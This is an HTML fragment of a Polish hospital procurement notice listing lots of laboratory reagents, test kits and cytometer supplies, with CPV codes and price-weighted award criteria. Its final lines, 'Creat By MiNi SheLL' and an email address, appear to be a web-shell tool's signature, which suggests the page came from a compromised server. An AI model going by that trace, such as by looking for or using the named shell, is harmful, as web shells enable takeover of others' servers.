<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Odczynniki dla Pracowni Cytogenetyki (1).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Tymidyna 		op	1
2	Chlorek potasu		op	1
3	Wodorotlenek baru 8 hydrat		op	1
4	Azotan Srebra cz.d.a.		op	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Odczynniki dla Pracowni Cytogenetyki (2).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Trypsyna 1: 250 w proszku		op	1
2	Ksylen		op	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Odczynniki dla Pracowni Analityki Ogólnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Barwnik May Grunwalda		op	16
2	Barwnik Giemsy		op	14
3	Bufor fosporanowy ph 7,2 koncentrat		op	8
4	Olejek imersyjny		op	25
5	Testy wieloparametrowe do oznaczania Narkotyków w moczu (amfetamina, kokaina, metamfetamina cat off 500 ?g/l, morfina, benzodiazepiny,trójpierścieniowe antydepresanty,marichuana, opiaty, ekstazy (MDMA)		szt	500
				
6	Zestwa do oznaczania krwi utajonej w kale (bez diety)		test	500
				
7	Helicobacter Pylori test kasetkowy w kale		test	700
8	Rotawirusy i adenowirusy w kale  test kasetkowy		test	1700
9	OdczynnikRosina		but.	1
10	Odczynnik Ehrliha		but.	4
11	Odczynnik Lugola		but.	1
12	Sudan III		but.	1
13	Odczynnik Pandiego		but.	1
14	Odczynnik Samsona		but.	1
15	ASO latex z kontrolami (+) i  (-)		op	6
16	RF latex z kontrolami    (+) i (-)		op	3
17	Kontrola dodatnia do ASO latex		op	5
18	Kontrola dodatnia do RF latex		op	5
19	Kwas sulfosalicylowy cz.d.a. 2-hydrat		op	3
20	Mononukleoza test kasetkowy		szt	500
21	Sulfitest- paski do oznaczania siarczynów w moczu		op	2
22	Giardia lamblia - test EIA do badania lambli w kale		op	7
23	Paski do moczu 11 parametrowe(ciężar właściwy,odczyn moczu, glukoza, białko, krew, leukocyty,azotyny, bilirubina, urobilinogen, aceton, kwas  askorbinowy).Zapewnienie kontroli wewnątrzlaboratoryjnej STANDLAB wraz z dostawą materiału kontrolnego do oceny oznaczeń paskowych -poziom negatywny i pozytywny raz na kwartał.		test	20000
24	Barwnik Grama		op	3
25	Mikroalbumina-test paskowy		szt	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Odczynniki dla Pracowni Cytometrii do Cytometru BDFACSCALIBUR firmy Becton Dicinson(2)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kulki kalibracyjne  ( FITC,PE,PercP,Unlabled) 25 t		op	4
				
2	 Kulki kalibracyjne APC /25 t		op	4
3	 Płyn do cytometru FACS Flow /20 l		op	5
4	Zestaw do immunofentypowania limfocytów krwi obwodowej zawierający: 1 fiolkę z przeciwciałami CD/3/8/45/4 1 fiolkę z przeciwciałami CD/3/16+56/45/19 + płyn infuzyjny		op	2
				
5	Płyn do cytometru FACS Rinse / 5l		op	1
6	Płyn do cytometru FACS Clean / 5l		op	1
7	Płyn do przygotowania próbek FACS Cell Wash /5 l		op	1
				
8	Płyn do cytometru FACS  Shoutdown / 5l		op	1
9	Probówki do cytometru FACS CALIBUR (12 x 75) PS z korkiem  po 1000 szt		op	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Odczynniki dla Pracowni Wad Metabolicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sodium nitrite (Azotyn sodu)  NaNO2 g 500 1
2	Biotin-4-amidobenzoic acid sodium sdlt mg 10	 1
3	Uridine-5 diphosphoglucose disodium salt (UDPG) mg 500 1
4	D Galactose-1-phosphate dipotassium salt mg 250 1
5	B Nicotinamide adenine dinucleotide phosphete hydrate (B-NADP TPN)mg 100	 1
6	1-butanol L 1 1
7	Kwas Cytrynowy g 500 1
8	TRIS - (hydroxymethyl) g	100	1
9	Cytrynian sodu ( Sodium citrate tribasic Dihydrate  98 procent titration	g 100 1				
10	Błękit toluidyny	 g 5 1
11	P-DIMETHYLAMINO-BENZALDEHYDE	g 100 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Odczynniki dla Pracowni Wad Metabolicznych (1).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Paski wskaźnikowe pH 1-14		op	2
2	Sodu chlorek cz.d.a.		op	1
3	Cytrynian Potasu 3-zasad.1		op	1
4	Azotyn sodu cz.d.a.		op	1
5	Kwas Solny 35- 38% cz.d.a.		op	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Odczynnik dla Pracowni Serologii (1).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	ZESTAW PRÓBEK KONTROLNYCH do codziennej kontroli odczynników diagnostycznych i krwinek wzorcowych do układu ABO i  Rh D  ZPK   		op	48.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com